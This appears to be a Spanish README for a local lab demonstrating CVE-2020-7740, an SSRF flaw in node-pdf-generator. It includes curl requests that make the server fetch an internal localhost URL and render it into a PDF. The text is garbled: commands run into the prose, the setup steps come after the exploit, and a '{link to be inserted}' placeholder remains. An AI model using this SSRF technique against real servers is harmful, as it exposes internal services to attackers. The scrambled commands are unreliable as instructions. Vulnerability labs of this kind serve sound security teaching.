
Un ejemplo de CVE-2020-7740
Esto afecta a todas las versiones del paquete node-pdf-generator. Debido a la falta de validación y sanitización de la entrada del usuario realizada al contenido proporcionado a node-pdf-generator, es posible que un atacante cree una URL que será pasada a un servidor externo permitiendo un ataque SSRF.
docker run -p 3000:3000 cve-2020-7740localhost:3001 directamentecurl --location --request GET localhost:3000/test --data-raw http://localhost:3001 --output test.pdftest.pdf para ver el sitio web localhost que se supone que está oculto.git clone {link to be inserted}https://wkhtmltopdf.org/node .\NodePdfGeneratorServer el servidor se ejecutará en localhost:3000python3 -m pip install -r requirements.txtpython3 HiddenService el servidor se ejecutará en localhost:3001curl --location --request GET localhost:3000/test --data-raw http://www.google.com --output test.pdfhttp://www.google.com en el archivo test.pdf